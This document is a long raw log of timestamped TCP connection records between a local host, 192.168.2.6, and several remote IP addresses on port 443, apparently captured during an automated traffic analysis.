                                                                                                                                                                                              Nov 24, 2024 13:39:15.413150072 CET44349718104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:15.714406967 CET49724443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:15.714461088 CET44349724104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:15.714565992 CET49724443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:15.714915037 CET49724443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:15.714936972 CET44349724104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:16.459743023 CET49725443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:39:16.459791899 CET4434972520.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:16.459920883 CET49725443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:39:16.460777998 CET49725443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:39:16.460796118 CET4434972520.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:16.942277908 CET4434971913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:16.943361998 CET49719443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:16.943428040 CET4434971913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:16.944148064 CET49719443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:16.944163084 CET4434971913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:16.991597891 CET44349724104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:16.991686106 CET49724443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:16.994693995 CET49726443192.168.2.64.175.87.197
                                                                                                                                                                                              Nov 24, 2024 13:39:16.994750023 CET443497264.175.87.197192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:16.994827986 CET49726443192.168.2.64.175.87.197
                                                                                                                                                                                              Nov 24, 2024 13:39:16.998265982 CET49724443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:16.998285055 CET44349724104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:16.998677015 CET44349724104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:17.001605988 CET49724443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:17.001701117 CET49724443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:17.001708984 CET44349724104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:17.006681919 CET49726443192.168.2.64.175.87.197
                                                                                                                                                                                              Nov 24, 2024 13:39:17.006705999 CET443497264.175.87.197192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:17.052424908 CET4434972013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:17.053195953 CET49720443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:17.053250074 CET4434972013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:17.053917885 CET49720443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:17.053932905 CET4434972013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:17.084403992 CET4434972213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:17.085055113 CET49722443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:17.085091114 CET4434972213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:17.085933924 CET49722443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:17.085947037 CET4434972213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:17.141374111 CET4434972313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:17.142009020 CET49723443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:17.142043114 CET4434972313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:17.142280102 CET4434972113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:17.142621040 CET49721443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:17.142631054 CET4434972113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:17.143055916 CET49721443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:17.143062115 CET4434972113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:17.143229961 CET49723443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:17.143235922 CET4434972313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:17.332657099 CET49702443192.168.2.6173.222.162.64
                                                                                                                                                                                              Nov 24, 2024 13:39:17.332725048 CET49702443192.168.2.6173.222.162.64
                                                                                                                                                                                              Nov 24, 2024 13:39:17.338613987 CET49727443192.168.2.6173.222.162.64
                                                                                                                                                                                              Nov 24, 2024 13:39:17.338655949 CET44349727173.222.162.64192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:17.338865042 CET49727443192.168.2.6173.222.162.64
                                                                                                                                                                                              Nov 24, 2024 13:39:17.342353106 CET49727443192.168.2.6173.222.162.64
                                                                                                                                                                                              Nov 24, 2024 13:39:17.342372894 CET44349727173.222.162.64192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:17.385467052 CET4434971913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:17.385641098 CET4434971913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:17.385720015 CET49719443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:17.385886908 CET49719443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:17.385935068 CET4434971913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:17.385967016 CET49719443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:17.385982037 CET4434971913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:17.389833927 CET49728443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:17.389874935 CET4434972813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:17.389951944 CET49728443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:17.390180111 CET49728443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:17.390194893 CET4434972813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:17.452528000 CET44349702173.222.162.64192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:17.452545881 CET44349702173.222.162.64192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:17.487375975 CET4434972013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:17.487448931 CET4434972013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:17.487519979 CET49720443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:17.487735033 CET49720443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:17.487783909 CET4434972013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:17.487814903 CET49720443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:17.487831116 CET4434972013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:17.492113113 CET49729443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:17.492168903 CET4434972913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:17.492269039 CET49729443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:17.492408037 CET49729443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:17.492423058 CET4434972913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:17.518582106 CET4434972213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:17.518690109 CET4434972213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:17.518769979 CET49722443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:17.518948078 CET49722443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:17.518955946 CET4434972213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:17.518968105 CET49722443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:17.518973112 CET4434972213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:17.521918058 CET49730443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:17.521970034 CET4434973013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:17.522083044 CET49730443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:17.522255898 CET49730443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:17.522272110 CET4434973013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:17.585184097 CET4434972313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:17.585258961 CET4434972313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:17.585393906 CET49723443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:17.585911036 CET49723443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:17.585921049 CET4434972113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:17.585958958 CET4434972313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:17.585989952 CET49723443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:17.585990906 CET4434972113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:17.586005926 CET4434972313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:17.586062908 CET49721443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:17.586339951 CET49721443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:17.586357117 CET4434972113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:17.586380005 CET49721443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:17.586390972 CET4434972113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:17.589550972 CET49731443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:17.589589119 CET4434973113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:17.589730978 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:17.589776993 CET49731443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:17.589776993 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:17.589879036 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:17.589899063 CET49731443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:17.589910984 CET4434973113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:17.590043068 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:17.590074062 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:17.691371918 CET44349724104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:17.691463947 CET44349724104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:17.691569090 CET49724443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:17.691747904 CET49724443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:17.691765070 CET44349724104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:18.203010082 CET49733443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:18.203053951 CET44349733104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:18.203214884 CET49733443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:18.203666925 CET49733443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:18.203676939 CET44349733104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:18.721195936 CET4434972520.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:18.721283913 CET49725443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:39:18.723596096 CET49725443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:39:18.723607063 CET4434972520.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:18.723931074 CET4434972520.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:18.726032019 CET49725443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:39:18.726090908 CET49725443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:39:18.726095915 CET4434972520.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:18.726243973 CET49725443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:39:18.767328978 CET4434972520.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:18.790472031 CET44349727173.222.162.64192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:18.790550947 CET49727443192.168.2.6173.222.162.64
                                                                                                                                                                                              Nov 24, 2024 13:39:18.885847092 CET443497264.175.87.197192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:18.885915041 CET49726443192.168.2.64.175.87.197
                                                                                                                                                                                              Nov 24, 2024 13:39:18.888328075 CET49726443192.168.2.64.175.87.197
                                                                                                                                                                                              Nov 24, 2024 13:39:18.888346910 CET443497264.175.87.197192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:18.888648033 CET443497264.175.87.197192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:18.933134079 CET49726443192.168.2.64.175.87.197
                                                                                                                                                                                              Nov 24, 2024 13:39:19.025463104 CET49726443192.168.2.64.175.87.197
                                                                                                                                                                                              Nov 24, 2024 13:39:19.071327925 CET443497264.175.87.197192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.213073969 CET4434972913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.213704109 CET49729443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:19.213736057 CET4434972913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.214236975 CET49729443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:19.214243889 CET4434972913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.230063915 CET4434973113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.230655909 CET49731443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:19.230669975 CET4434973113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.231067896 CET49731443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:19.231074095 CET4434973113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.243783951 CET4434973013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.244174957 CET49730443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:19.244203091 CET4434973013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.244613886 CET49730443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:19.244621038 CET4434973013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.323519945 CET4434972520.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.323801041 CET4434972520.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.323875904 CET49725443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:39:19.324023008 CET49725443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:39:19.379699945 CET4434972813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.380311012 CET49728443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:19.380364895 CET4434972813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.380839109 CET49728443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:19.380846977 CET4434972813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.453516006 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.454087019 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:19.454123020 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.454668045 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:19.454674959 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.558422089 CET44349733104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.558511019 CET49733443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:19.560051918 CET49733443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:19.560066938 CET44349733104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.560317993 CET44349733104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.561754942 CET49733443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:19.562644005 CET49733443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:19.562683105 CET44349733104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.562843084 CET49733443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:19.562879086 CET44349733104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.562968016 CET49733443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:19.563014030 CET44349733104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.563244104 CET49733443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:19.563275099 CET44349733104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.563395977 CET49733443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:19.563431025 CET44349733104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.564304113 CET49733443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:19.564332962 CET44349733104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.564346075 CET49733443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:19.564527988 CET49733443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:19.564548016 CET49733443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:19.611329079 CET44349733104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.611485958 CET49733443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:19.611522913 CET49733443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:19.611532927 CET49733443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:19.633157969 CET443497264.175.87.197192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.633187056 CET443497264.175.87.197192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.633193970 CET443497264.175.87.197192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.633203030 CET443497264.175.87.197192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.633238077 CET443497264.175.87.197192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.633255005 CET49726443192.168.2.64.175.87.197
                                                                                                                                                                                              Nov 24, 2024 13:39:19.633270979 CET443497264.175.87.197192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.633280993 CET49726443192.168.2.64.175.87.197
                                                                                                                                                                                              Nov 24, 2024 13:39:19.633280993 CET49726443192.168.2.64.175.87.197
                                                                                                                                                                                              Nov 24, 2024 13:39:19.633304119 CET49726443192.168.2.64.175.87.197
                                                                                                                                                                                              Nov 24, 2024 13:39:19.655549049 CET443497264.175.87.197192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.655627012 CET443497264.175.87.197192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.655654907 CET49726443192.168.2.64.175.87.197
                                                                                                                                                                                              Nov 24, 2024 13:39:19.655667067 CET49726443192.168.2.64.175.87.197
                                                                                                                                                                                              Nov 24, 2024 13:39:19.655891895 CET49726443192.168.2.64.175.87.197
                                                                                                                                                                                              Nov 24, 2024 13:39:19.655906916 CET443497264.175.87.197192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.657526016 CET4434972913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.657601118 CET4434972913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.657821894 CET49729443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:19.657850981 CET49729443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:19.657864094 CET4434972913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.657881021 CET49729443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:19.657886028 CET4434972913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.659324884 CET44349733104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.659439087 CET49733443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:19.659470081 CET49733443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:19.659488916 CET49733443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:19.661730051 CET49735443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:19.661777020 CET4434973513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.661843061 CET49735443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:19.662012100 CET49735443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:19.662028074 CET4434973513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.664491892 CET4434973113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.664549112 CET4434973113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.664589882 CET49731443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:19.664711952 CET49731443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:19.664716005 CET4434973113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.664726019 CET49731443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:19.664729118 CET4434973113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.667450905 CET49736443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:19.667490005 CET4434973613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.667601109 CET49736443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:19.667747974 CET49736443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:19.667756081 CET4434973613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.696441889 CET4434973013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.696659088 CET4434973013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.696758032 CET49730443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:19.696789980 CET49730443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:19.696806908 CET4434973013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.696820974 CET49730443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:19.696829081 CET4434973013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.699337959 CET49737443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:19.699362993 CET4434973713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.699408054 CET49737443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:19.699543953 CET49737443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:19.699558020 CET4434973713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.703322887 CET44349733104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.703397036 CET49733443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:19.751322985 CET44349733104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.819076061 CET44349733104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.841062069 CET4434972813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.841125011 CET4434972813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.841274977 CET49728443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:19.849066019 CET49728443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:19.849080086 CET4434972813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.857634068 CET49738443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:19.857662916 CET4434973813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.857745886 CET49738443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:19.858144999 CET49738443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:19.858151913 CET4434973813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.912884951 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.912955046 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.912997961 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:19.913202047 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:19.913223028 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.913237095 CET49732443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:19.913244009 CET4434973213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.916630983 CET49739443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:19.916665077 CET4434973913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:19.917315006 CET49739443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:19.920715094 CET49739443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:19.920727015 CET4434973913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:21.480602980 CET4434973513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:21.484352112 CET49735443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:21.484385967 CET4434973513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:21.484658957 CET49735443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:21.484673977 CET4434973513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:21.517277002 CET4434973713.107.246.63192.168.2.6
